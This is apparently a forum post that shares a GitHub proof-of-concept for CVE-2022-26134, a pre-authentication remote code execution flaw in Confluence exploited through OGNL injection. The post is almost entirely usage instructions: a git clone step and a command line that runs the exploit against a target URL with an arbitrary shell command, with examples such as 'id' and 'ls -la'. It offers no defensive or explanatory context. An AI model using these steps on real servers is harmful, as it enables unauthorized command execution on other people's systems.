View Single Post
  #3  
Old 03-27-2025, 10:41 AM

blankface blankface is offline
Banned
Join Date: Mar 2023
Posts: 0
Default


https://github.com/crowsec-edtech/CVE-2022-26134
CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection
Download PoC script
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
Run exploit
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'